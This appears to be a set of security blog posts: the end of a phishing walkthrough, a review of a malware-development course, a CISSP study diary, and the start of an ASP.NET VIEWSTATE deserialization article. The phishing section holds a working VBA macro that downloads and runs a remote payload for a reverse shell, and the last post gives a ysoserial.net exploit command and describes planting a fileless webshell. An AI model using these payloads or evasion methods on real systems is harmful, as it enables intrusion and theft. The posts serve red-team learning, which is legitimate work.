  3. You craft a fake Word document that appears to be a notice of this month’s layoffs and “mistakenly” send it to the administrator. You dress it up really nice with all the Confidential headers and footers. Of course there is no real document – it’s a blurred image, and enabling macros begins and carries out the compromise. It looks like this



    Payload:
    Sub AutoOpen()

    Dim PayloadFile As Integer
    Dim FilePath As String
    FilePath = "C:\tmp\payload.vbs"
    PayloadFile = FreeFile

    ' Create the VBS dropper, write it to disk and execute it.
    ' The VBS reaches out to a remote server, downloads the payload and executes it.
    Open FilePath For Output As PayloadFile

    Print #PayloadFile, "HTTPDownload ""https://REMOTE-SERVER/PAYLOAD.EXE"", ""C:\tmp\"""
    Print #PayloadFile, ""
    Print #PayloadFile, "Sub HTTPDownload(myURL, myPath)"
    Print #PayloadFile, "Dim i, objFile, objFSO, objHTTP, strFile, strMsg, currentChar,res,decoded_char"
    Print #PayloadFile, " Const ForReading = 1, ForWriting = 2, ForAppending = 8"
    Print #PayloadFile, " Set objFSO = CreateObject(""Scripting.FileSystemObject"")"
    Print #PayloadFile, " If objFSO.FolderExists(myPath) Then"
    Print #PayloadFile, " strFile = objFSO.BuildPath(myPath,Mid(myURL,InStrRev( myURL,""/"")+ 1))"
    Print #PayloadFile, " ElseIf objFSO.FolderExists(Left(myPath,InStrRev( myPath, ""\"" )- 1)) Then"
    Print #PayloadFile, " strFile = myPath"
    Print #PayloadFile, " End If"
    Print #PayloadFile, ""
    Print #PayloadFile, " Set objFile = objFSO.OpenTextFile(strFile, ForWriting, True)"
    Print #PayloadFile, " Set objHTTP = CreateObject(""WinHttp.WinHttpRequest.5.1"")"
    Print #PayloadFile, " objHTTP.Open ""GET"", myURL, False"
    Print #PayloadFile, " objHTTP.Send"
    Print #PayloadFile, ""
    Print #PayloadFile, " res = objHTTP.ResponseBody"
    Print #PayloadFile, " For i = 1 To LenB(objHTTP.ResponseBody)"
    Print #PayloadFile, " currentChar = Chr(AscB(MidB(objHTTP.ResponseBody, i, 1)))"
    Print #PayloadFile, " objFile.Write currentChar"
    Print #PayloadFile, " Next"
    Print #PayloadFile, " objFile.Close( )"
    Print #PayloadFile, " Set WshShell = WScript.CreateObject(""WScript.Shell"")"
    Print #PayloadFile, " WshShell.Run ""C:\tmp\PAYLOAD.EXE"""
    Print #PayloadFile, " End Sub"

    Close PayloadFile
    Shell "wscript c:\tmp\payload.vbs"

    End Sub


  4. The administrator viciously opens the email, the macro detonates, the payload executes, and you get your reverse shell.

Now that we have a way to execute payloads, on to converting the payload into a C2 host and setting up the infrastructure! Here’s a video of the process.

How’d I Get Phished from S7acktrac3 on Vimeo.

The post Pharm Raised Phish 😅🤠 appeared first on Certification Chronicles.

A Review of the Sektor7 RED TEAM Operator: Malware Development Essentials Course

24 March 2020 at 15:20

A Review of the Sektor7 RED TEAM Operator: Malware Development Essentials Course

Introduction

I recently discovered the Sektor7 RED TEAM Operator: Malware Development Essentials course on 0x00sec and it instantly grabbed my interest. Lately I’ve been working on improving my programming skills, especially in C, on Windows, and in the context of red teaming. This course checked all those boxes, and was on sale for $95 to boot. So I broke out the credit card and purchased the course.

Custom code can be a huge benefit during pentesting and red team operations, and I’ve been trying to level up in that area. I’m a pentester by trade, with a little red teaming thrown in, so this course was right in my wheelhouse. My C is slightly rusty, not having done much with it since college, and almost exclusively on Linux rather than Windows. I wasn’t sure how prepared I would be for the course, but I was willing to try harder and do as much research as I needed to get through it.

Course Overview

The course description reads like this:

It will teach you how to develop your own custom malware for latest Microsoft Windows 10. And by custom malware we mean building a dropper for any payload you want (Metasploit meterpreter, Empire or Cobalt Strike beacons, etc.), injecting your shellcodes into remote processes, creating trojan horses (backdooring existing software) and bypassing Windows Defender AV.

It’s aimed at pentesters, red teamers, and blue teamers wanting to learn the details of offensive malware. It covers a range of topics aimed at developing and delivering a payload via a dropper file, using a variety of mechanisms to encrypt, encode, or obfuscate different elements of the executable. From the course page the topics include:

  • What is malware development
  • What is PE file structure
  • Where to store your payload inside PE
  • How to encode and encrypt payloads
  • How and why obfuscate function calls
  • How to backdoor programs
  • How to inject your code into remote processes

RTO: Malware Development Essentials covers the above with 9 different modules, starting with the basics of the PE file structure, ending with combining all the techniques taught to create a dropper executable that evades Windows Defender while injecting a shellcode payload into another process.

The course is delivered via a content platform called Podia, which allows streaming of the course videos and access to code samples and the included pre-configured Windows virtual machine for compiling and testing code. Podia worked quite well, and the provided code was clear, comprehensive, well-commented, and designed to be reusable later to create your own executables.

Module 1: Intro and Setup

The intro and setup module covers a quick intro to the course and getting access to the excellent sample code and a virtual machine OVA image that contains a development environment, debugger, and tools like PEBear. I really like that the VM was provided, as it made jumping in and following along effortless, as well as saving time creating a development environment.

Module 2: Portable Executable

This module covers the Portable Executable (PE) format, how it is structured, and where things like code and data reside within it. It introduces PEBear, a tool for exploring PE files I’d not used before. It also covers the differences between executables and DLLs on Windows.

Module 3: Droppers

The dropper module covers how and where to store payload shellcode within a PE, using the .text, .data, and .rsrc sections. It also covers including external resources and compiling them into the final .exe.

Module 4: Obfuscation and Hiding

Obfuscation and hiding was one of my favorite modules. Anyone that has had their shellcode or implants caught will appreciate knowing how to use AES and XOR to encrypt payloads, and how to dynamically decrypt them at runtime to prevent static analysis. I also learned a lot about Windows and the Windows API through the sections on dynamically resolving functions and function call obfuscation.
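The course's own code is in C, but the XOR idea it teaches can be illustrated with a short sketch of my own (not course material): the same routine encrypts the payload at build time and decrypts it at runtime, defeating static signature scans of the stored bytes.

```python
def xor_crypt(data: bytes, key: bytes) -> bytes:
    """XOR each payload byte with a repeating key; applying it twice restores the original."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))

shellcode = b"\x90\x90\xcc\xc3"        # placeholder bytes, not a real payload
key = b"mysecret"
encrypted = xor_crypt(shellcode, key)  # what gets embedded in the dropper
decrypted = xor_crypt(encrypted, key)  # what the dropper recovers at runtime
```

AES works the same way conceptually, just with a real cipher instead of XOR, at the cost of linking or implementing the crypto routine inside the dropper.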

Module 5: Backdoors and Trojans

This section covered code caves, hiding data within a PE, and how to backdoor an existing executable with a payload. x64dbg debugger is used extensively to examine a binary, find space for a payload, and ensure that the existing binary still functions normally. Already knowing assembly helped me here, but it’s explained well enough for those with little to no assembly knowledge to follow along.

Module 6: Code Injection

I learned a ton from this section, and it really clarified my knowledge of process injection, including within a process, between processes, and using a DLL. VirtualAllocEx, WriteProcessMemory, and CreateRemoteThread are more than just some function names involving process injection to me now.

Module 7: Extras

This module covered the differences between GUI and console programs on Windows, and how to ensure the dreaded black console window does not appear when your payload is executed.

Module 8: Combined Project

This was the culmination of the course, where you are walked through combining all the individual techniques and tools you learned throughout the course into a single executable. I suggest watching it and then doing it yourself independently to really internalize the material.

Module 9: Assignment

The last module is an assignment, which asks you to take what you’ve learned in the combined project and more fully implement some of the techniques, as well as providing some suggestions for real-world applications of the course content you can try by yourself.

Takeaways

I learned a heck of a lot from this course. It was not particularly long, but it covered the topics thoroughly and gave me a good base to build from. I can’t remember a course where I learned so much in so little time. Not only did I learn what was intended by the course, but there were a lot of ancillary things I picked up along the way that weren’t explicitly covered.

C on Windows

I found the course to be a good introduction to C on Windows, assuming you are already familiar with C. It’s not a beginning C programming course by any means. Most of my experience with C has been on Linux with gcc, and the course provided practical examples of how to write C on Windows, how to use MSDN effectively, how to structure programs, and how to interact with DLLs. I was familiar with many of the topics at a high level, but there’s no substitute for digging in and writing code.

Intro to the Windows API

I also learned a great deal on how the Windows API works and how to interact with it. The section on resolving functions manually was especially good. I have a much stronger grasp of how Windows presents different functionalities, and how to lookup functions and APIs on MSDN to incorporate them into my own code.

Making Windows Concepts Concrete

As mentioned above, there were a lot of areas I knew about at a high level, like process injection, DLLs, the Import Address Table, even some Windows APIs like WriteProcessMemory and CreateRemoteThread. But once I looked up their function signatures on MSDN, called them myself, created my own DLLs, and obfuscated the IAT, I had a much more concrete understanding of each topic, and I feel much more prepared to write my own tools in the future using what I’ve learned.

A Framework For Building Your Own Payloads

The way the course built from small functions and examples, all meant to be reused and built upon, really made the course worthwhile and feel like an investment I could take advantage of later in my own tools. I’ve already managed to craft a dropper that executes a staged Cobalt Strike payload that evades Windows Defender. How’s that for a practical hands-on course?

No Certification Exam

The course is not preparation for or in any way associated with a certification exam, which in this case I think is a good thing. The course presents fundamental knowledge that is immensely useful in offensive security, and I think it’s best learned for its own sake rather than to add more letters after your name. I like certifications in general and have several, but I found myself not worried about covering the material for an exam and enjoyed learning the material and thinking of practical applications of it at work and in CTFs, Hack The Box, etc. instead. It’s a nice feeling.

Conclusion

I loved this course, and reenz0h is a phenomenal instructor. If it’s not been obvious so far, I’ve gained a lot of fascinating and practical knowledge that will be useful far into the future. My recommendation: take this course if you can. It’s affordable, not an excessive time commitment, and worth every second and penny you spend on it. And just in case my enthusiasm comes across as excessive or shilling, I have no association with Sektor7, their employees, or the authors of the course. Just a happy pentester with some new skills.

Slayed CISSP

15 March 2020 at 23:03

I saw this day a countless amount of times in the last two months. Typing this blog post after passing the exam, is a surreal feeling. Forecasting a goal, envisioning its completion, and driving it home is the things fairy-tales are made of. How the air smells at that time? What does it taste like? Why I deserve it? How all the countless hours of study I am willing to endure would eventually lead to pay-dirt and once again, me on top! Triumphant. How relieved I’d be? How much elation I’d be feeling. Like having a superpower to force anything I want into existence. Gotta have that vision!

I’ll get to what studying looked like, felt like, exam review dialogue and such soon. Yes! This post is LONG. But guess what, I’m the one who had to write it. I didn’t do it for myself, I did it for you. The length was dictated by however many words I needed to produce a post with the context of what I would have wanted in hindsight after passing the exam. Most of the blogs I see are humble brags of people looking for everyone to kiss their feet since they passed it. Some are really good, like the ones at the end of the post. Some are long and list out key things you should be on the lookout for, like CMMI or BCP, without any other context, continuing by saying how it was the MOST difficult test of their life and how they felt like they were going to fail when the test ended. I just don’t think this is or has to be the typical case. Anyone can pass the CISSP – keep reading and I’ll detail how to study and why most of the practice materials are broken. You could extrapolate something out of that too (if you only use the recommended study materials you will fail).

The point needs to be restated that I think the journey is the most valuable portion of attempting certifications, not the actual cert. This one, for instance, proves you are not only familiar with all the content from the 8 domains, but also able to synthesize and apply it to scenario-based situations using sound risk management principles, acting as an Information Security Manager. Not only do I want to provide a valuable resource for exam preparation, but also give you insight and texture into my life during the entire process.

Part-1: What’s My Motivation?

Time: Late December 2019

Self-introspection (self-observation) is important as a regular check on self-development that helps you know what you have achieved so far.

I was promoted in December 2019 to Application Security Manager 😛 (for context). Christmas is a really special time in the Caribbean so I try to be there every year during that holiday period. (That’s how you end the year baby 👊🏽) So literally the next day after getting home from the trip (still having a week off before I go back to work) I start to get the feeling. Anybody know what I’m talking bout? The thirst? Watch TV for maybe a few hours, go out a day, chill, then it’s like “What am I doing with my life? What’s all this idle time I have? How do normal people do nothing for most of their lives?” Happens to me every time 💯

I had preconceived thoughts about CISSP honestly. “It’s typical to fail on first try” … “It’s a management exam” … “It’s an inch deep mile wide”  … “Reddit horror stories”  … “Folks literally studying on average 6 months some 1 year”. After doing some research I decided it was the one for me. Not only would it give some sort of legitimacy to my new position, it would, in addition, significantly broaden my understanding of Information Security and Risk Management.

I ordered the following studying materials the same day based on research from CISSP sub-reddit:

Major S/O to that sub – it’s a trove of information! That’s part of why I blog: to keep this process continually flowing and provide helpful materials to those after you. We have to realize that 90% of the time we’re acting as consumers, not producers. I think it takes a certain level of appreciation for the field overall to be devoted to giving back in whatever form you can. We all have something we can contribute ‼

Life happened and I wasn’t able to start studying immediately. Shame because I got a free same-day delivery of the books. I never even opened the package when it came. Put it in my office and it sat there for most of January.

Part-2: What Was The Preparation Like?

Time: End of January 2020

Thinking about sports, and basketball in particular – how many free throws might an average player shoot per day when trying to improve their percentage? 50 free throws per day? 100? 500? That number may actually be around two thousand or more. Now let’s abstract that a little and dumb it down for a second. It’s not going to be anything novel. You need to consistently be shooting your free throws. In this case it’s all the practicing, reading all the materials from different sources, doing more practice questions, flashcards – it’s all a part of the process. You can’t go a weekend without studying, or even a day. Consistently & repeatedly!

You guys know by now, there’s nothing special about me. I just feel like when I really want something there’s an insatiable thirst to quench and maybe a borderline obsession for me to get it. I guess what I’m trying to say is I know how to “Lock In”. I literally had hundreds of unanswered LinkedIn messages, DMs, texts, everything. I cut everybody off and focused on the task at hand. It would need my utmost attention at all times. There’s absolutely no going out, minimal TV; if I’m commuting I’m reading, if I’m on break I’m reading or researching, when I get home I’m getting settled at say 5 pm and then grinding till I’m dozing off. In bed I’m reading. When I wake up, before I get out of the bed, I’m reading. Around this time is when you realize you could live with someone and be a complete stranger to them in the same house 😂 So some of the attributes that describe someone in this stage are consistency, dedication, resolve, discipline, resiliency.

You have to REALLY want it. When you do, you are laser-focused. As random as this is, I see myself in my head as I’m typing this as a heat-seeking missile. I’m coming in hot and I will not miss! I care about accuracy and precision. You get the picture. Whatever it means to you – “Lock In” – that’s the mode you need to be in, keeping in mind it’s a marathon not a sprint. Life will happen and some days you’ll be much more motivated than others – but anything in your control better be related to CISSP.

  • Sybex Official Study Guide 8th Edition (8/10) – This behemoth took me about 2 weeks to finish. I didn’t read it intently but more skimming and identifying what I absolutely don’t know, or if I know something’s right for the wrong reason. You can register the Sybex book along w/ the practice tests on the Wiley test bank. It allows you to take the chapter questions in the exam atmosphere instead of writing in the book, as well as practice exams. All your work is tracked and saved. After I finished reading the book I registered it and proceeded to go thru each domain’s chapter questions. I would say my average was in the 60’s for most of them. Bunch of new material; there’s definitely a vast amount of knowledge you need for every single domain. I was familiar with the SDLC / Security Testing / IR domains from work-related experience. Gets two dings for being so damn big. Very useful, but again it’s not something you can use alone to pass the exam despite it being the “Official Study Guide” 🤔
  • Kelly Handerhan’s videos (9/10) – Sadly these aren’t free anymore 😥 She really does an amazing job of relaying complex topics in an easy, digestible manner. She also gives you the 2nd half of what you need to pass: the mindset. Even with the recent price change I still think this is worth however much it costs. You won’t read one Reddit or ISC2 post that doesn’t mention her. Gets a ding since you can’t pass the exam with this alone. I scored low on my first Sybex practice test after her videos, so I spot-checked which domains I was coming up short in and went back to read them in the Sybex book again.
  • Boson Test Engine (8/10) – One of the most valuable resources. Great bank of test questions with amazingly well-written, thorough explanations. The secret sauce here is that whether or not you get an answer incorrect, you read the explanation. You’re confirming here if you were right for the wrong reason, or why you were wrong, or in what scenarios one of the other answers could possibly be right. That’s the beauty of Boson. This helps you identify where you’re weak. Guess what you do after? You use the book or another source (tons of material out there) to better understand whatever it is. The reason Boson gets 2 dings is that the beauty is in the explanations, not necessarily the questions, which in hindsight are way too technical – reminiscent of all the study material tests.
  • It’s now about mid-February and a blessing falls from the sky directly into my lap. I find my MOST valuable resource.
    Discord CISSP Server (12/10). This type of forum was perfect for most of my learning when tackling technical certs, so I knew it would push me here. Everyone in there is amazing, and there’s some unmatched wisdom for sure! This drastically improved the amount of information I retained as well as the depth of that information. I think this is the case because you’re not just in your head, alone in your room with a book. You’re now defending your argument on a particular question, or understanding why you’re wrong, and this goes on 24/7 since the group is global. 4 pm EST or 4 am, there are ALWAYS active discussions going on. There’s a psychological aspect to this as well. Feeling like you’re alone in a fight is depressing. Having an active army of mission-oriented soldiers all ready to fight, defend and operate 🔫 ?! Oh now this is a whole different story! Don’t underestimate the power of a topic being explained to you by a person instead of a blog post. I’ll forever be a part of this channel – definitely my new brothers and sisters. Blame most of me passing on them!
  • I start to do a million practice questions from anything I could find: books, practice sites, old materials. I guesstimate I did over six thousand practice questions. I can remember off hand doing 1300 in a 2-day stretch 🧾 At this point I’m at about 5 hrs a day on weekdays and at least 12+ hrs on weekends #overdrive
  • Sari Green’s CISSP course (9/10). Decided to change the pace a little bit. This was awesome, very helpful, with the most important thing being she delivers the material with a strong risk management undertone. Another thing was how she aligned the entire course with the sections in the CISSP domain outline. Gets a ding since the material is about 5 years old so it misses new information about some of the topics, like IoT, SCADA, and embedded devices. Recommended.
  • Mike Chapple’s LinkedIn Learning CISSP course (9/10). Very good! The course is taught in a way that isn’t typical of what you’d expect in a CISSP course. The way he provides practical realizations of the topics to seal them in is incredible. You can memorize PGP until the cows come home, get hit with a question, and only know that PGP stands for Pretty Good Privacy 😂 memorization won’t help you in the exam. He shows you real-life implementations of the exam topics. Wonderful course.
  • After I finished all those I started from domain one and did the following for all 8 domains
    • Read Sybex chapter summary
    • Read 11th hr chapter summary
    • Watch Sari domain summary
    • Do Mike Chapple practice questions for associate domain
  • We’re at about 2 weeks out now, time-wise. I started to read all the NIST documents related to the major processes in the various domains. These actually were well written and I learned to love them. Every night I would open them and try to relate everything I was doing back to risk management. I’m still doing practice problems, but maybe like 10 a day at this point. Most of my time is spent trying to understand the SDLC in depth, the IR process in depth, the BCP/DR process in depth. You not only need to understand the order of the processes but all the details & outputs that come from each.
  • (Maybe one month earlier, 2 members of the squad from Discord and I discovered we all have the same exam date.) The day before the exam I get hit up to join a conference with both of them to do some last-day studying. Without this I wouldn’t have passed. We spend 10 hours going over all the major processes, ironing out our understanding and tying everything back to the RMF. It’s 10 pm the night before the exam and boy, I’m thinking I probably shouldn’t have done all of that studying today in fear of cramming and losing it. I’m also pissed at myself for drinking a Red Bull 30 minutes earlier, because I should be sleeping, but an hour has gone by and I’m still wide awake – I hope I get to sleep soon in fear of not getting good rest and failing.

Part-3: You Didn’t Do All This Work For Nothing, Did You?

Time: Mid-March 2020

When I scheduled my exam I purposely chose a Saturday morning. I did not want to deal with the variables that a “normal” morning commute might include – so I was going to be lazy and Uber to the testing center. But being so paranoid, I just drove there and paid the crazy fee to park in the garage. I listened to Kelly’s “Why You Will Pass The CISSP” video and Larry Greenblat’s “CISSP Exam Tips” videos before leaving the car. Crazy seeing only about 4 people, when on a regular day a low count would be around 50-100, with tons of traffic at any given time – people jogging, women pushing strollers, people and their dogs, as well as tons of business folk – it’s directly across the street from a train station.

At this point, the sports reference is to boxing. Here are my thoughts walking from the garage to the exam center – “You did not come this far to lose, did you? You’ve been wrong countless times on Discord and understood why. You worked your buns off! You learned the material, the mindset; you’ve watched hundreds of videos, did thousands of questions, read tons of pages. You’ve got some of the most distinguished practical offensive certs in existence; are you going to let a multiple choice management exam that most people fail because they don’t slow down to read defeat you? You’re going to knock this exam on its face. You already envisioned this day many times before. This is going to turn out just like all the other times – you put in the work and the results are going to prove such is true at the end. If you synthesized the information the way you think you do, you’re going to do amazing.” This is how I’m trying to make myself feel.

In reality I’m scared as shit about this exam 😂 it’s not that I don’t know the material – it’s that I don’t know what I don’t know. Most people on Reddit say when they see the first 25 questions they sometimes wonder if the proctor configured them for the wrong exam 😌 Here’s what calmed me down, sorta grounded me. I had small talk with a guy as we’re walking to the bathroom and we ask one another what we’re up against this morning. Turns out he, along with 90% of the other people there (16 total), was taking his medical exam. It was 7 hrs! I literally said to myself “Shitttt boy you got it good!” 🤣 It’s all relative 💭 My number gets called and I get seated for the exam. They had disposable covers for the noise-cancelling headphones 🤞🏽

I had this plan to write all my brain dump stuff on the pad they gave me before starting. You get 5 minutes to read and sign the NDA. One of the things I wanted to write down was the forensic process. I started to list the phases out and got stuck after “Collection” – it scared the living fucking daylights out of me. I said “F-This” and clicked “Start Exam”, true story 🤦🏽‍♂️

Part-4: Put Up Or Shut Up!

The questions didn’t seem like they were designed to trick me. I was comfortable with the terms in most questions. The difficulty is in the subjective and vague nature of all the questions. Unlike the practice questions, which test if you know terms and definitions, the exam places you in scenarios where you play from the perspective of a security manager and have to apply sound risk management principles – remembering your job is to reduce risk, provide information for senior management, and apply the appropriate level of protection to your assets depending on their value and classification. Most of the questions are BEST, LEAST, WORST, with all the possible choices either being all right or all wrong. On a bunch of occasions I was able to eliminate 2 off the jump. The remaining 2 choices are what’s going to keep you up at night. I got a crazy subnetting question that I attempted to start breaking down on my pad to binary and do the powers of 2; after 20 seconds I said “F-This” and clicked “Next”. There were some gimmies sprinkled in there as well. Don’t forget “inch deep, mile wide”; it’s way too much material for every single question to be a boulder. I made sure to slow down, scrutinize every word in the questions, re-read all questions and answers, and read back the answer I chose. If a question was “Blah blah blah .. Which of the following features of Digital Signatures would BEST provide you with a solution to prevent unauthorized tampering?” … And the answer is integrity … Before moving on I’d say “Integrity is the feature of Digital Signatures that best provides the solution to the problem” … Here’s what I saw most, followed by a question to illustrate the context for each one:

  • SDLC Related – Which SDLC phase is Change Management most likely to be a part of?
  • BCP Related – A global pandemic of a deadly virus is on the brink. How does the BIA help you determine your risk?
  • IR Related – The sky is falling and something just hit you in the head. What process of IR are you most likely in?
  • Bunch of stuff on Access Controls – How can I best protect this if that?
  • One question of Encryption – Understand PPP L2TP PPTP L2F their succession which ones can use IPSEC, EAP
  • Bunch of Risk Management – Something just happened you need to do something. With these constraints. What’s best?
  • Asset and Data Classification/Security – Why do we classify anything?
  • Web Application Attack Recognition – Seeing and recognizing attacks described through a scenario or graphical depiction
  • US and Global Privacy Frameworks – GDPR – ECPA – OECD
  • Roles and Responsibilities – Who’s MOST important for security? CISO CEO ISM ISSO?
  • Communication & Network Security – What layer is LLC most likely a part of?

I was nervous as hell clicking “Next” on the 100th question. I knew if the exam ended I either did really well or really horribly; if it continued I knew I was exactly on the borderline and could still pass up to 150, but each question would have to be correct. If that were the case I wouldn’t have been pissed, but I didn’t want to even be in that situation. The exam stops. I’m like “HOLY SHIT”. I get the TA’s attention, she signs me out and I go to the reception area to get the print-out. The receptionist was at the bathroom 😫 had to wait 5 minutes for her to come back. I was pacing so much the entire time I probably could have burned a hole in their damn carpet. The lady takes my ID, prints out the result, peeks at it, folds it and gives it to me looking me dead in the eye with a straight face. But I did notice it was one piece of paper, and people said if you get one paper you passed – if you get more it’s because you failed and that’s the explanation of the domains you came up short in. I opened it and saw I had PASSED 😍 I threw the wildest air punch in history, luckily didn’t hurt myself, jumped up and down a little (nobody else in the reception area at this point), said “LET’S GO” as loud as I could (since the students are literally just around the corner) and noticed the receptionist now smiling; she said “Congratulations, sorry I had to mess with you” 😂 Here it was guys, that moment of passing that I envisioned! Slaying the dragon. What a wonderful feeling 💘

Part-5: Thoughts?

If you’ve made it this far s/o to you! I’ll never write a TL/DR ever ✌🏽 The context matters … The journey matters.

My biggest advice would be to make the NIST RMF, the SDLC and all the related documents your friends. These are going to help you substantially more than doing a zillion practice questions or reading the huge books. It also sheds light on why so many smart technical folk fail this exam the first time. The day before the exam, me, @Beedo and @Reepdeep – MAJOR S/O TO THOSE GUYS, WHO ALSO PASSED THE SAME DAY – studied from 1 pm to 10 pm going through all the processes from each domain, in our own words, understanding the steps of each process and how every single thing ties back to risk management.
NOTE: We think the document we created could help everyone out there as a definitive source for passing the exam. Obviously folks need to get back to real life and the people they’ve neglected since beginning the journey, but it’s something we all feel strongly about and want to provide to the community hopefully soon 😎

Part-6: Things I Shared on Discord That I Think Should Be Included Here?

These are just excerpts, but I figured they may be valuable since you forget basically everything related to the exam afterwards.
Bear with me as the grammar may not be perfect; it’s Discord, so I wasn’t necessarily careful to correct mistakes. It’s conversational, texting-like language, most of it typed from my phone.

In regards to the difference in seemingly all the practice material vs real exam:

“I see why all the practice material misses the mark. It’s because you truly need an intelligent person to spend the time to make those questions, and that person costs too much to write free questions on the internet for us .. Those aren’t ones you come up with based on a definition .. You understand someone thought deeply about this, so much so that they knew the answer I’d immediately go for (and it’s wrong) and included it as, say, answer A, and made the right answer further down the list like D. You need to be very careful. I also saw 2 similar-looking answers where, if you jumped immediately to the first answer and didn’t thoroughly read, you wouldn’t have noticed the 2nd one further down was more right”

In regards to our day before exam study conference: 

It was impromptu as hell; I was just going over each of my Boson question explanations. It lasted a lot longer than expected 😵🥴 We went from like 1-10 yesterday on the conference, went over each process, understanding it and connecting the SDLC steps and BCP steps back to the RMF. I’m sure they’ll agree understanding how everything relates back to the RMF is the way to pass. Not technical … Not all the questions … since they’re way too technical (use em to identify and reinforce your weak areas); we were already studied up at that point … Sybex/Boson/AIO/all the sources’ questions are way too hard if we’re talking scope for the exam. You’ll be placed in a bunch of situations where you’re somebody in security: what’s the BEST/LEAST solution for this scenario?

On depth of question and context. Keep in mind we already knew the blocks lengths, key size ect:

For context, it’s like understanding AES is a strong symmetric algorithm and DES is a weak one that shouldn’t be used, but not that 3DES EEE has an xyz-bit key and goes through xy rounds – the latter is unnecessary .. If you know it, so be it, but that’s how I would scope everything: high level, and how does it connect back to the RMF .. I would read the RMF and SDLC NIST docs every night

On what I think is useful studying:

I’m saying: you’ve read Sybex or another big book, feel comfortable, been browsing Reddit, know the sources, the videos and all the questions we do here, and can go through the 11th Hour and understand everything. Then I would focus on the processes and how they relate to RM: SDLC, IR, BCP. Knowing how those relate was my entire exam. I had a bunch of SDLC stuff, a lot of OWASP “what vulnerability is this?”, and a few questions from domain 4 on IPSec and understanding the protocol or layer.

Overall exam tips and thoughts:

“The exam was tough, but at no point did I feel they were trying to trick or deceive me; on every question I was able to eliminate two answers off the bat. Some of the answers are similar, then you figure out the differences, which was slightly hard in some cases, some not. I felt familiar with all the terms and answers. Questions were clear. I didn’t even notice the experimental ones, which I was on the lookout for. I think when studying we equate inch deep mile wide with difficult. In reality it’s just understanding how the domains work together. Remember every question CANNOT be a boulder. There were some gimmes… what is encryption… what is integrity for digital signatures type stuff. My best advice in hindsight with the above is DO NOT WASTE YOUR TIME doing all these questions, Boson, Ccure, Luke, Sybex. All of them! Only if you’re weak. If you can read the 11th Hour and nothing’s a shock, stop. Understand how everything is bound by risk management. Btw I didn’t use the whole mgr mindset, I just tried to pick the best of the 2 remaining options. There were plenty of answers that were “doing something”; I threw those out automatically”

On how I would study differently:

“Don’t worry, and spend some time in the NIST documents 800-64 and 800-37; they all link to each other. So your thinking going through, say, the SDLC is: what am I doing in this step and how does it relate back to the RMF? Everything relates back to it. For example, in phase one of the SDLC you have your requirements and such, but you’re also initially understanding the system, which links back to step one in the RMF, which is Categorize. So think: does this system store, transmit or process PII, and what’s the risk? Or step two, Development, in the SDLC: you know you’re starting design, architecture, development and testing; that relates to steps 2 & 3 (you also do a risk assessment here) in the RMF. You identified the need for the system in the initial requirements, so now in development we select the controls of the system and assess them. That’s in SDLC phase two, but you’re always grounded by the RMF. See how that relates? I think that understanding this alone is how I passed”

Are questions from sybex syllabus or out of the box?
Way too technical, as are all the practice questions

Some people fail who had boson?
Boson shouldn’t be used to judge readiness, just to identify weak areas. You could get 20% on all Bosons and pass since it’s mostly thinking, not technical

How’s the difficulty level?
NOT DIFFICULT – DON’T BELIEVE THE HYPE – ALL OF US COULD PASS THIS EXAM

Do we need other source of study hindsight?
Read the NIST documents on all the processes and reclaim some of your time back

You say everyone in this group can pass; can you tell your experience and main domain?
Mainly offsec, and I’ve done appsec at work for like 4 years. I’m an engineer so I have the fix-it mindset by default. You don’t need to be an expert in anything. Just thinking of everything in terms of risk mgmt is enough to pass

How long you have been preparing?
Studying since 1/28

What was the most difficult domain for you?
Domain 2 smh – Focus on 1, 3, 7 though, and definitely 8 .. Obviously you need to be passing in all domains, but since those are weighted more it’s more advisable

Did you face any language-mixing puzzle questions, meaning they use different vocabulary?
There were NO gimmicks; on every question I knew exactly what they wanted.

Do you think people from industries other than security find it more difficult?
It’s your understanding and mindset. Kelly and Larry tell you the mindset. I automatically threw out any answer that was “disconnect from the network, make a firewall change”.

Did you feel it’s purely management?
No. Because being in mgmt although you’re not a doer you need to have a solid understanding of the underlying area no matter what it is.”

S/O to my Discord guys ALL OF YOU 💗

I’ve included a section below on the links that were most valuable to me. Good luck & NEVER give up or give in!

Part-7: Links

The post Slayed CISSP appeared first on Certification Chronicles.

Having Fun with ASP.NET VIEWSTATE Deserialization Attacks and Building a Fileless Backdoor

10 March 2020 at 16:00

Introduction

This article echoes the topic I shared at DEVCORE CONFERENCE 2019: how to use small flaws to break, step by step, into hardened web applications built on the ASP.NET framework. One part of that talk covered how, several times in past red team engagements, we successfully used VIEWSTATE deserialization attacks to create a breakthrough point into internal networks, along with our takeaways; that is the subject of this article.

Body

Recently, Microsoft's Exchange Server was hit by a critical vulnerability, CVE-2020-0688. The root cause is that every Exchange Server installation uses the same fixed machine key in one of its components. By now everyone is quite familiar with the exploitation routine once a machine key is obtained: tamper with the VIEWSTATE parameter in an ASP.NET form to mount a deserialization attack, achieving remote code execution and taking control of the whole server.

For more details on CVE-2020-0688, see the ZDI blog:

Countless articles already explore VIEWSTATE exploit analysis in depth, so this article will not repeat it. Instead, I mainly want to talk about how to put the VIEWSTATE exploit to use in penetration testing.

The most basic and common approach is to use the ViewState plugin of ysoserial.net directly to generate a valid MAC and correctly encrypted content. After a chain of reflection calls, the TypeConfuseDelegate gadget by default invokes Process.Start to call cmd.exe, triggering execution of arbitrary system commands.

For example:

ysoserial.exe -p ViewState -g TypeConfuseDelegate
              -c "echo 123 > c:\pwn.txt"
              --generator="CA0B0334"
              --validationalg="SHA1"
              --validationkey="B3B8EA291AEC9D0B2CCA5BCBC2FFCABD3DAE21E5"

An abnormal VIEWSTATE usually causes the aspx page to respond with a 500 Internal Server Error, so we cannot directly see the result of the executed command. But given arbitrary execution, it is not hard to pop a reverse shell with PowerShell or send the command output back to an external server.

But ..

In real-world penetration tests, things often aren't that rosy. Corporate security awareness is relatively high these days, and it is now the norm for target server environments to have restrictions like the following:

  • All outbound connections are blocked
  • External DNS queries are forbidden
  • The web directory is not writable
  • The web directory is writable, but a website defacement protection mechanism automatically restores files

This is where the capability of another gadget, ActivitySurrogateSelectorFromFile, can be put to full use. This gadget achieves remote code execution by calling Assembly.Load to dynamically load a .NET assembly. In other words, it gives us the ability to execute arbitrary .NET code in the same runtime environment as the aspx pages. By default, .NET also exposes some global static variables that point to shared resources; for example, System.Web.HttpContext.Current returns the context object of the current HTTP request. It feels like being able to run an aspx page we wrote ourselves, with the whole process handled dynamically in memory, which amounts to planting a fileless WebShell backdoor!

